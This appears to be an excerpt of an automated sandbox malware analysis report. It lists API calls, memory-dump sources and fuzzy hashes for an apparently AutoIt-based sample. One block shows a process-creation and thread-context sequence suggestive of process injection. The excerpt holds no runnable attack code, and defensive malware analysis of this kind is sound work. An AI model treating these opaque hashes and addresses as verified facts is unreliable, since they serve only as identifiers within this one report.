                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 359caf2b0c7fb73a4b2fc4639a35e682d7a05af177178f57be9cc97287755a8a
                                                            • Instruction ID: 9f6112e85946098db2965002016c16fc80cb71ed2bab159227f63c82473eae09
                                                            • Opcode Fuzzy Hash: 359caf2b0c7fb73a4b2fc4639a35e682d7a05af177178f57be9cc97287755a8a
                                                            • Instruction Fuzzy Hash: F7019231201B15DFE6156B69FC52B6E7B88FFC1774F50012AFD01EB192DAB09D0186E6
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,008797D2,?,?,?,?,?,00000004), ref: 00879B45
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008797D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00879B5B
                                                            • CloseHandle.KERNEL32(00000000,?,008797D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00879B62
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: 6cc7bf332dd1df1a025142fc7655d15ba312497bafc5c001adb0b0a31466299d
                                                            • Instruction ID: 4b2cb47541ae7bb83464eb87d7964bc0bc9c6185e6e255299000a68494b950a9
                                                            • Opcode Fuzzy Hash: 6cc7bf332dd1df1a025142fc7655d15ba312497bafc5c001adb0b0a31466299d
                                                            • Instruction Fuzzy Hash: 7FE08632180224F7D7222B64EC09FCA7B18FB05771F148121FB54E90E187B1651197D8
                                                            APIs
                                                            • _free.LIBCMT ref: 00878FA5
                                                              • Part of subcall function 00832F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00839C64), ref: 00832FA9
                                                              • Part of subcall function 00832F95: GetLastError.KERNEL32(00000000,?,00839C64), ref: 00832FBB
                                                            • _free.LIBCMT ref: 00878FB6
                                                            • _free.LIBCMT ref: 00878FC8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                            • Instruction ID: d3468ea3e3ed0301e869ec0c6a0aaee37649d7bb7206f2deea20280bae8b6b40
                                                            • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                            • Instruction Fuzzy Hash: 0AE012B16097018ACA34A57CAD44AA357EEFF88360B18081DF40DDB146DE24E8419165
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CALL
                                                            • API String ID: 0-4196123274
                                                            • Opcode ID: 4153402280970eae16d154b287b3ba5d5cde0aa3709b27e114d3706efe400cc2
                                                            • Instruction ID: 052a2563950a78648b0bfa1bffc0ca1930241fba52d779e77d598131410915f5
                                                            • Opcode Fuzzy Hash: 4153402280970eae16d154b287b3ba5d5cde0aa3709b27e114d3706efe400cc2
                                                            • Instruction Fuzzy Hash: AA224770509645DFCB28DF18C494AAABBE5FF84304F15895DE89ACB362D731EC85CB82
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: EA06
                                                            • API String ID: 4104443479-3962188686
                                                            • Opcode ID: b207e315c57bc0728f0f478d85032cf75a433c260c2e2fdd3cff332974708e3a
                                                            • Instruction ID: 0e85d6223915c824bba4e98d0f68bb6702aa521b06bd23c07099b7fba56f82e6
                                                            • Opcode Fuzzy Hash: b207e315c57bc0728f0f478d85032cf75a433c260c2e2fdd3cff332974708e3a
                                                            • Instruction Fuzzy Hash: F7418071A0465C9BCF115B68D8517FE7FAEFF45324F685065E842DB382C5218DC087E2
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 00814992
                                                              • Part of subcall function 008335AC: __lock.LIBCMT ref: 008335B2
                                                              • Part of subcall function 008335AC: DecodePointer.KERNEL32(00000001,?,008149A7,008681BC), ref: 008335BE
                                                              • Part of subcall function 008335AC: EncodePointer.KERNEL32(?,?,008149A7,008681BC), ref: 008335C9
                                                              • Part of subcall function 00814A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00814A73
                                                              • Part of subcall function 00814A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00814A88
                                                              • Part of subcall function 00813B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00813B7A
                                                              • Part of subcall function 00813B4C: IsDebuggerPresent.KERNEL32 ref: 00813B8C
                                                              • Part of subcall function 00813B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,008D62F8,008D62E0,?,?), ref: 00813BFD
                                                              • Part of subcall function 00813B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00813C81
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008149D2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                            • String ID:
                                                            • API String ID: 1438897964-0
                                                            • Opcode ID: 274510b4a6a67a68707c700a4de3f4d131d9c98eac4e06b1d49cda93939a3503
                                                            • Instruction ID: 9ed35ee68a3f454eff0612527e88094350ed2657ca6e0e85d64bd92e7c92bb69
                                                            • Opcode Fuzzy Hash: 274510b4a6a67a68707c700a4de3f4d131d9c98eac4e06b1d49cda93939a3503
                                                            • Instruction Fuzzy Hash: 22116771909315ABC700EF68E80594ABFE9FF98710F004A1BF085C72B1EB709698CB96
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00815981,?,?,?,?), ref: 00815E27
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00815981,?,?,?,?), ref: 0084E19C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 982403327bff05acfec3ff1d28d2781832cd9d3b963592f828d956f79ca2b486
                                                            • Instruction ID: 1a617657b4d09fc16c57a12bf52c74d5edbff1f3da75b2177eecdb4521e40f73
                                                            • Opcode Fuzzy Hash: 982403327bff05acfec3ff1d28d2781832cd9d3b963592f828d956f79ca2b486
                                                            • Instruction Fuzzy Hash: 88019270684708FEF3651E24CC8AFA63B9CFF01768F108319BAE59A1E0C6B01E858B54
                                                            APIs
                                                              • Part of subcall function 0083594C: __FF_MSGBANNER.LIBCMT ref: 00835963
                                                              • Part of subcall function 0083594C: __NMSG_WRITE.LIBCMT ref: 0083596A
                                                              • Part of subcall function 0083594C: RtlAllocateHeap.NTDLL(017B0000,00000000,00000001,00000000,?,?,?,00831013,?), ref: 0083598F
                                                            • std::exception::exception.LIBCMT ref: 0083102C
                                                            • __CxxThrowException@8.LIBCMT ref: 00831041
                                                              • Part of subcall function 008387DB: RaiseException.KERNEL32(?,?,?,008CBAF8,00000000,?,?,?,?,00831046,?,008CBAF8,?,00000001), ref: 00838830
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: 6b468a16c0f8ed4f916da9fa6954eff2577cf7d821c761bb0aa0e47568166676
                                                            • Instruction ID: 4a550cc53982a4f02b01d67f45dcd25544a6f61a59f937be468b86c0348a8cb4
                                                            • Opcode Fuzzy Hash: 6b468a16c0f8ed4f916da9fa6954eff2577cf7d821c761bb0aa0e47568166676
                                                            • Instruction Fuzzy Hash: 9CF0F93450071DA6CB24EA9CEC1A9DF77A8FF41750F100425F904D1982DFB08A8486D1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __lock_file_memset
                                                            • String ID:
                                                            • API String ID: 26237723-0
                                                            • Opcode ID: 55bcbfde0126098b3e7e8643d093346018807e05f199f82b985b58b8fc47da89
                                                            • Instruction ID: e5b2d7ea2db1cb484645d32a0458bd40979727e9aef307725819b6358b7557a3
                                                            • Opcode Fuzzy Hash: 55bcbfde0126098b3e7e8643d093346018807e05f199f82b985b58b8fc47da89
                                                            • Instruction Fuzzy Hash: F1012171801A09EBCF12AF6D8C0699F7B61FFC0760F158225B824DB1A1DB358A21DBD2
                                                            APIs
                                                              • Part of subcall function 00838D68: __getptd_noexit.LIBCMT ref: 00838D68
                                                            • __lock_file.LIBCMT ref: 0083561B
                                                              • Part of subcall function 00836E4E: __lock.LIBCMT ref: 00836E71
                                                            • __fclose_nolock.LIBCMT ref: 00835626
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: 48e1829f4800e1be491f4eff05f3d4cb3c1758feffda1028b058b6e3c89ef5c0
                                                            • Instruction ID: 169a610786c3d403d3382dd38268df23305028cc8669deacc2a6b981f7e44c49
                                                            • Opcode Fuzzy Hash: 48e1829f4800e1be491f4eff05f3d4cb3c1758feffda1028b058b6e3c89ef5c0
                                                            • Instruction Fuzzy Hash: 92F09071904B05DAD721AB7D880376EA7A1FFD0334F658209B824EB1C1DF7C8A019BD6
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 02441A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02441AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02441B13
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                            • Instruction ID: 0d95ad7d48b05499c958a0ec4c86cc3e3ee04bbfe2e9608478a0d13b261b1a21
                                                            • Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                            • Instruction Fuzzy Hash: 7412BD24E24658C6EB24DF64D8507DEB232EF68700F1090E9910DEB7A5E77A4F81CF5A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 71a15e9944377db040660174e253baae9efc1531ff06e00263abb64994a6aa91
                                                            • Instruction ID: e44202cd487241d0198d235b7ff06a650e73c7b560764767cdcd75be201fef93
                                                            • Opcode Fuzzy Hash: 71a15e9944377db040660174e253baae9efc1531ff06e00263abb64994a6aa91
                                                            • Instruction Fuzzy Hash: BF619C7060060A9FCB14DF68C991AEAB7E9FF48308F148479EA0AD7252E731ED95CB51
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f6f246b76be45e66eb009a1b7a0934b5936620c0ea3b4f5870f82eb27d4b2fb
                                                            • Instruction ID: 7af1348308ce3e5003aab563b1b8917fdd2578a13849cf5e61a44044bd94a4f2
                                                            • Opcode Fuzzy Hash: 5f6f246b76be45e66eb009a1b7a0934b5936620c0ea3b4f5870f82eb27d4b2fb
                                                            • Instruction Fuzzy Hash: F4519F34600614EFCF14EB68D991EAE77A9FF84310F148068F946EB382DA30ED54CB42
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 0749668f09d687d3419381967738c62aff8acc7792b4f3907a803470fc18d96a
                                                            • Instruction ID: b3ecd135d1c22e005a4db903f2707cdbacd78ce3ed739ab5fcd620fdede1a6b0
                                                            • Opcode Fuzzy Hash: 0749668f09d687d3419381967738c62aff8acc7792b4f3907a803470fc18d96a
                                                            • Instruction Fuzzy Hash: F7318D79208A02DFD7249F1CD490A61F7B8FF49310B14C56DE98ACB7A5EB30E881CB84
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00815CF6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: ff02e83a3575322d242739734592aacf5b1518e730975cbe5472602d2ecdad89
                                                            • Instruction ID: a289fdc1fa1d65a8fab01df05a17b8498fea61b3a67feddf87aeb3956ed24153
                                                            • Opcode Fuzzy Hash: ff02e83a3575322d242739734592aacf5b1518e730975cbe5472602d2ecdad89
                                                            • Instruction Fuzzy Hash: F6312A71A00B09EFCB18DF2DD484A99B7B9FF88314F148629D819D3714D771A9A0DBD1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: dd2f11c8cfb62c54127fbbbe609f88f94f7e11b9942c25c46df6707fd9827a7a
                                                            • Instruction ID: 2251c4f8bf12fb2e06fb613f2e4d00083bc0a5103c5d4b1a3f678d57e6a26866
                                                            • Opcode Fuzzy Hash: dd2f11c8cfb62c54127fbbbe609f88f94f7e11b9942c25c46df6707fd9827a7a
                                                            • Instruction Fuzzy Hash: C541F574508751CFDB28DF18C494B5ABBE0FF45318F19889CE9898B362C336E889CB52
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                                            • Instruction ID: c326e2b2e3e146930155055bb73f7ecbec8bd04ddc5964c031fad5e20e9fc912
                                                            • Opcode Fuzzy Hash: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                                            • Instruction Fuzzy Hash: 4811B431208215AFD714DF1CC491CAEB7ADFF45324724851EE815DB291DF32AC9187D1
                                                            APIs
                                                              • Part of subcall function 00814D13: FreeLibrary.KERNEL32(00000000,?), ref: 00814D4D
                                                              • Part of subcall function 0083548B: __wfsopen.LIBCMT ref: 00835496
                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008D62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00814F6F
                                                              • Part of subcall function 00814CC8: FreeLibrary.KERNEL32(00000000), ref: 00814D02
                                                              • Part of subcall function 00814DD0: _memmove.LIBCMT ref: 00814E1A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                            • String ID:
                                                            • API String ID: 1396898556-0
                                                            • Opcode ID: 89167d8bad53f84d1bd6accd18c69874742877d1481a1a90c31d18a766dbd101
                                                            • Instruction ID: 57b3a6a2c31625243dea34e916660f78cdec380763e069f6db45b16111b60bb2
                                                            • Opcode Fuzzy Hash: 89167d8bad53f84d1bd6accd18c69874742877d1481a1a90c31d18a766dbd101
                                                            • Instruction Fuzzy Hash: F611B231600609AACB14AF68D802BEE77A9FF44710F208429F541E6281DEB59A459792
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: ee8f55f1862763acc9a2a6d3a791b11013a6a072864b2c2109a3863828dc147a
                                                            • Instruction ID: efa6bcf2354b47ffe2c38b2a83cdca54267f26568499cf673b7d68441b6119ae
                                                            • Opcode Fuzzy Hash: ee8f55f1862763acc9a2a6d3a791b11013a6a072864b2c2109a3863828dc147a
                                                            • Instruction Fuzzy Hash: 68212474508341DFCB18DF54C444A5ABBE4FF84714F048968E98A87722D731E889CB93
                                                            APIs
